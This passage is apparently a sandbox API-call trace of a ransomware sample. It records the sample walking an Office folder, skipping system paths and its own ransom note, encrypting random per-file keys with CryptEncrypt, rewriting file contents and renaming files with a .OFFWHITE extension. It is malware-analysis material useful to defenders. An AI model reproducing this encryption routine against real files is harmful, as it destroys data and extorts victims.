lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.762] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xa6760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.763] WriteFile (in: hFile=0x218, lpBuffer=0x52eac0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eac0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.763] GetProcessHeap () returned 0x500000 [0144.763] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xa6560) returned 0x2a60020 [0144.763] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.763] ReadFile (in: hFile=0x218, lpBuffer=0x2a60020, nNumberOfBytesToRead=0xa6560, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d1c0*=0xa6560, lpOverlapped=0x0) returned 1 [0144.835] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.835] WriteFile (in: hFile=0x218, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0xa6560, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d1cc*=0xa6560, lpOverlapped=0x0) returned 1 [0144.837] GetProcessHeap () returned 0x500000 [0144.837] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0144.842] CloseHandle (hObject=0x218) returned 1 [0144.842] GetProcessHeap () returned 0x500000 [0144.842] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.842] GetProcessHeap () returned 0x500000 [0144.842] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.842] GetProcessHeap () returned 0x500000 [0144.842] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.842] GetProcessHeap () returned 0x500000 [0144.842] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.842] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" [0144.842] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.OFFWHITE" [0144.842] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll.offwhite")) returned 1 [0144.843] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x2b60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="OUTLWVW.DLL.trx_dll", cAlternateFileName="OUTLWV~1.TRX")) returned 1 [0144.843] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".") returned 1 [0144.843] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="..") returned 1 [0144.843] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="...") returned 1 [0144.843] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="windows") returned -1 [0144.843] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0144.843] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="rsa") returned -1 [0144.843] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0144.843] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="programdata") returned -1 [0144.844] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="appdata") returned 1 [0144.844] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="program files") returned -1 [0144.844] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0144.844] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.844] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="OUTLWVW.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" [0144.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.844] PathFindExtensionW (pszPath="OUTLWVW.DLL.trx_dll") returned=".trx_dll" [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.844] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.844] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.844] GetProcessHeap () returned 0x500000 [0144.845] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ead0 [0144.845] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.845] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=11104) returned 1 [0144.845] GetProcessHeap () returned 0x500000 [0144.845] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.845] GetProcessHeap () returned 0x500000 [0144.845] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.845] GetProcessHeap () returned 0x500000 [0144.845] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.845] GetProcessHeap () returned 0x500000 [0144.845] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.845] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.845] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.845] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.846] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.846] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.846] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.846] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.846] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.846] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.846] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.846] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.846] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.846] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.846] SetLastError (dwErrCode=0x0) [0144.846] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.849] GetLastError () returned 0x0 [0144.849] GetLastError () returned 0x0 [0144.849] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.849] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.849] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.849] WriteFile (in: hFile=0x218, lpBuffer=0x52ead0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ead0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.849] GetProcessHeap () returned 0x500000 [0144.849] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2b60) returned 0x5607c8 [0144.849] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.849] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x2b60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x2b60, lpOverlapped=0x0) returned 1 [0144.854] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.854] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x2b60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x2b60, lpOverlapped=0x0) returned 1 [0144.855] GetProcessHeap () returned 0x500000 [0144.855] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.855] CloseHandle (hObject=0x218) returned 1 [0144.855] GetProcessHeap () returned 0x500000 [0144.855] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.855] GetProcessHeap () returned 0x500000 [0144.855] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.855] GetProcessHeap () returned 0x500000 [0144.855] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.855] GetProcessHeap () returned 0x500000 [0144.855] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.855] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" [0144.855] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.OFFWHITE" [0144.855] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll.offwhite")) returned 1 [0144.856] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cef6000, ftCreationTime.dwHighDateTime=0x1cac803, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7cef6000, ftLastWriteTime.dwHighDateTime=0x1cac803, nFileSizeHigh=0x0, nFileSizeLow=0xcd60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="PPINTL.DLL.trx_dll", cAlternateFileName="PPINTL~1.TRX")) returned 1 [0144.856] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".") returned 1 [0144.856] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="..") returned 1 [0144.856] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="...") returned 1 [0144.856] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="windows") returned -1 [0144.856] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0144.856] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="rsa") returned -1 [0144.856] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0144.856] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="programdata") returned -1 [0144.856] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0144.856] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="program files") returned -1 [0144.856] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0144.856] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.857] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="PPINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" [0144.857] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.857] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.857] PathFindExtensionW (pszPath="PPINTL.DLL.trx_dll") returned=".trx_dll" [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.857] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.857] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.857] GetProcessHeap () returned 0x500000 [0144.857] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eae0 [0144.857] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.858] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=52576) returned 1 [0144.859] GetProcessHeap () returned 0x500000 [0144.859] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.859] GetProcessHeap () returned 0x500000 [0144.859] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.859] GetProcessHeap () returned 0x500000 [0144.859] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.859] GetProcessHeap () returned 0x500000 [0144.859] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.859] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.859] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.859] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.859] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.859] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.859] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.859] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.859] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.859] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.859] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.859] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.860] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.860] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xcd60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.860] SetLastError (dwErrCode=0x0) [0144.860] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.862] GetLastError () returned 0x0 [0144.862] GetLastError () returned 0x0 [0144.862] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xce60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.862] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.863] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xcf60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.863] WriteFile (in: hFile=0x218, lpBuffer=0x52eae0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eae0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.863] GetProcessHeap () returned 0x500000 [0144.863] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xcd60) returned 0x5607c8 [0144.863] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.863] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0xcd60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0xcd60, lpOverlapped=0x0) returned 1 [0144.867] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.867] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0xcd60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0xcd60, lpOverlapped=0x0) returned 1 [0144.868] GetProcessHeap () returned 0x500000 [0144.868] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.868] CloseHandle (hObject=0x218) returned 1 [0144.868] GetProcessHeap () returned 0x500000 [0144.868] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.868] GetProcessHeap () returned 0x500000 [0144.868] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.868] GetProcessHeap () returned 0x500000 [0144.868] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.868] GetProcessHeap () returned 0x500000 [0144.868] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.868] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" [0144.868] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.OFFWHITE" [0144.868] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll.offwhite")) returned 1 [0144.941] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cef6000, ftCreationTime.dwHighDateTime=0x1cac803, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7cef6000, ftLastWriteTime.dwHighDateTime=0x1cac803, nFileSizeHigh=0x0, nFileSizeLow=0x45f60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="PPINTL.REST.trx_dll", cAlternateFileName="PPINTL~2.TRX")) returned 1 [0144.941] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".") returned 1 [0144.941] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="..") returned 1 [0144.941] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="...") returned 1 [0144.941] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="windows") returned -1 [0144.941] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0144.941] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="rsa") returned -1 [0144.941] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0144.942] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="programdata") returned -1 [0144.942] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="appdata") returned 1 [0144.942] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="program files") returned -1 [0144.942] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="program files (x86)") returned -1 [0144.942] lstrcpyW (in: 